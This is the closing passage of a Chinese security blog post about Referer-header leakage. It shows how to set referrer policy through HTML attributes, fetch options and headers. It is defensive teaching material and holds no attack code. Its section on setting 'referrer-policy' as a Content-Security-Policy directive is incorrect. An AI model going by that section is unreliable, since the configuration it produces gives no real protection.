<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">a</span> <span class="attr">href</span>=<span class="string">&quot;https://example.com&quot;</span> <span class="attr">referrerpolicy</span>=<span class="string">&quot;origin&quot;</span>&gt;</span>Visit Example<span class="tag">&lt;/<span class="name">a</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">form</span> <span class="attr">action</span>=<span class="string">&quot;https://anothersite.com&quot;</span> <span class="attr">method</span>=<span class="string">&quot;POST&quot;</span> <span class="attr">referrerpolicy</span>=<span class="string">&quot;no-referrer&quot;</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;/<span class="name">form</span>&gt;</span></span><br></pre></td></tr></table></figure>
<ol start="4">
<li><strong>在<code> AJAX</code> 中配置 <code>referrer-policy</code>:</strong>  对于通过 <code>JavaScript</code> 发起的 <code>AJAX</code> 请求：</li>
</ol>
<ul>
<li>
<p><strong>使用 <code>fetch</code> API:</strong> 在 <code>fetch</code> 请求的配置对象中，使用 <code>referrerPolicy</code> 选项设置特定的策略。例如：</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="title function_">fetch</span>(<span class="string">&#x27;/api/data&#x27;</span>, &#123;</span><br><span class="line">  <span class="attr">method</span>: <span class="string">&#x27;GET&#x27;</span>,</span><br><span class="line">  <span class="attr">referrerPolicy</span>: <span class="string">&#x27;origin-when-cross-origin&#x27;</span></span><br><span class="line">&#125;)</span><br><span class="line"><span class="comment">// ...</span></span><br></pre></td></tr></table></figure>
<p>此设置会覆盖全局的 <code>referrer-policy</code>。</p>
</li>
<li>
<p><strong>使用 <code>XMLHttpRequest</code>:</strong> <code>XMLHttpRequest</code> 本身没有直接的 <code>referrerPolicy</code> 属性。你需要依赖全局的 <code>referrer-policy</code> 设置（HTTP 头部或 <code>&lt;meta&gt;</code> 标签）。</p>
</li>
</ul>
<ol start="5">
<li><strong>在内容安全策略 (CSP) 中配置 <code>referrer-policy</code>:</strong></li>
</ol>
<p><code>referrer-policy</code> 可以作为 CSP 指令的一部分在 HTTP 响应头或 HTML <code>&lt;meta&gt;</code> 标签中设置。</p>
<ul>
<li><strong>HTTP 头部中的 CSP:</strong></li>
</ul>
<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="attribute">Content-Security-Policy</span><span class="punctuation">: </span>referrer-policy origin-when-cross-origin</span><br></pre></td></tr></table></figure>
<ul>
<li><strong>HTML <code>&lt;meta&gt;</code> 标签中的 CSP:</strong></li>
</ul>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;!DOCTYPE <span class="keyword">html</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">html</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">head</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">meta</span> <span class="attr">http-equiv</span>=<span class="string">&quot;Content-Security-Policy&quot;</span> <span class="attr">content</span>=<span class="string">&quot;referrer-policy origin-when-cross-origin&quot;</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">head</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">body</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;/<span class="name">body</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">html</span>&gt;</span></span><br></pre></td></tr></table></figure>
<p>在 <code>CSP</code> 中设置 <code>referrer-policy</code> 会强制整个文档及其发起的请求遵循该策略，但会被更具体的设置（如 <code>fetch</code> API 中的 <code>referrerPolicy</code> 或 HTML 元素的 <code>referrerpolicy</code> 属性）覆盖。</p>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
        
          <li><a href="/">Home</a></li>
        
          <li><a href="/archives/">Writing</a></li>
        
          <li><a href="/tags/">Tag</a></li>
        
          <li><a href="/categories/">Category</a></li>
        
          <li><a href="/search/">Search</a></li>
        
          <li><a href="/about/">About</a></li>
        
      </ul>
    </div>

    
    
      <div id="toc-footer" style="display: none">
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%89%8D%E8%A8%80"><span class="toc-number">1.</span> <span class="toc-text">前言</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%94%BB%E5%87%BB%E5%9C%BA%E6%99%AF%E6%BC%94%E7%A4%BA"><span class="toc-number">2.</span> <span class="toc-text">攻击场景演示</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Referrer-policy"><span class="toc-number">3.</span> <span class="toc-text">Referrer-policy</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#referrer-policy-%E7%9A%84%E5%8F%96%E5%80%BC"><span class="toc-number">3.1.</span> <span class="toc-text">referrer-policy 的取值</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%A6%82%E4%BD%95%E8%AE%BE%E7%BD%AE-referrer-policy%EF%BC%9F"><span class="toc-number">3.2.</span> <span class="toc-text">如何设置 referrer-policy？</span></a></li></ol></li></ol>
      </div>
    

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://x2nn.github.io/2025/05/06/%E6%95%B0%E6%8D%AE%E5%8C%85referer%E5%A4%B4%E4%B8%AD%E6%95%8F%E6%84%9F%E4%BF%A1%E6%81%AF%E7%9A%84%E7%AA%83%E5%8F%96/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://x2nn.github.io/2025/05/06/%E6%95%B0%E6%8D%AE%E5%8C%85referer%E5%A4%B4%E4%B8%AD%E6%95%8F%E6%84%9F%E4%BF%A1%E6%81%AF%E7%9A%84%E7%AA%83%E5%8F%96/&text=数据包referrer头中敏感信息的窃取"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://x2nn.github.io/2025/05/06/%E6%95%B0%E6%8D%AE%E5%8C%85referer%E5%A4%B4%E4%B8%AD%E6%95%8F%E6%84%9F%E4%BF%A1%E6%81%AF%E7%9A%84%E7%AA%83%E5%8F%96/&title=数据包referrer头中敏感信息的窃取"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://x2nn.github.io/2025/05/06/%E6%95%B0%E6%8D%AE%E5%8C%85referer%E5%A4%B4%E4%B8%AD%E6%95%8F%E6%84%9F%E4%BF%A1%E6%81%AF%E7%9A%84%E7%AA%83%E5%8F%96/&is_video=false&description=数据包referrer头中敏感信息的窃取"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=数据包referrer头中敏感信息的窃取&body=Check out this article: https://x2nn.github.io/2025/05/06/%E6%95%B0%E6%8D%AE%E5%8C%85referer%E5%A4%B4%E4%B8%AD%E6%95%8F%E6%84%9F%E4%BF%A1%E6%81%AF%E7%9A%84%E7%AA%83%E5%8F%96/"><i class="fa-solid fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://x2nn.github.io/2025/05/06/%E6%95%B0%E6%8D%AE%E5%8C%85referer%E5%A4%B4%E4%B8%AD%E6%95%8F%E6%84%9F%E4%BF%A1%E6%81%AF%E7%9A%84%E7%AA%83%E5%8F%96/&title=数据包referrer头中敏感信息的窃取"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://x2nn.github.io/2025/05/06/%E6%95%B0%E6%8D%AE%E5%8C%85referer%E5%A4%B4%E4%B8%AD%E6%95%8F%E6%84%9F%E4%BF%A1%E6%81%AF%E7%9A%84%E7%AA%83%E5%8F%96/&title=数据包referrer头中敏感信息的窃取"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://x2nn.github.io/2025/05/06/%E6%95%B0%E6%8D%AE%E5%8C%85referer%E5%A4%B4%E4%B8%AD%E6%95%8F%E6%84%9F%E4%BF%A1%E6%81%AF%E7%9A%84%E7%AA%83%E5%8F%96/&title=数据包referrer头中敏感信息的窃取"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://x2nn.github.io/2025/05/06/%E6%95%B0%E6%8D%AE%E5%8C%85referer%E5%A4%B4%E4%B8%AD%E6%95%8F%E6%84%9F%E4%BF%A1%E6%81%AF%E7%9A%84%E7%AA%83%E5%8F%96/&title=数据包referrer头中敏感信息的窃取"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://x2nn.github.io/2025/05/06/%E6%95%B0%E6%8D%AE%E5%8C%85referer%E5%A4%B4%E4%B8%AD%E6%95%8F%E6%84%9F%E4%BF%A1%E6%81%AF%E7%9A%84%E7%AA%83%E5%8F%96/&name=数据包referrer头中敏感信息的窃取&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://x2nn.github.io/2025/05/06/%E6%95%B0%E6%8D%AE%E5%8C%85referer%E5%A4%B4%E4%B8%AD%E6%95%8F%E6%84%9F%E4%BF%A1%E6%81%AF%E7%9A%84%E7%AA%83%E5%8F%96/&t=数据包referrer头中敏感信息的窃取"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fa-solid fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        
          <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fa-solid fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fa-solid fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
      <div class="footer-left">
        Copyright &copy;
        
        
        2024-2025
        X2n.
      </div>
      <div class="footer-right">
        <nav>
          <ul>
            <!--
          --><li><a href="/">Home</a></li><!--
        --><!--
          --><li><a href="/archives/">Writing</a></li><!--
        --><!--
          --><li><a href="/tags/">Tag</a></li><!--
        --><!--
          --><li><a href="/categories/">Category</a></li><!--
        --><!--
          --><li><a href="/search/">Search</a></li><!--
        --><!--
          --><li><a href="/about/">About</a></li><!--
        -->
          </ul>
          <ul>
            
              <!-- 不蒜子统计 -->
              <span id="busuanzi_container_site_pv">
                  本站总访问量<span id="busuanzi_value_site_pv"></span>次
              </span>
              <span class="post-meta-divider">|</span>
              <span id="busuanzi_container_site_uv" style='display:none'>
                      本站访客数<span id="busuanzi_value_site_uv"></span>人
              </span>
            <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
            
          </ul>
        </nav>
      </div>
      
</footer>


    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->

  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script>




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script>
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="fa-regular fa-clone"></i>';
    btn += '</span>';
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Disqus Comments -->

<!-- utterances Comments -->

</body>
</html>
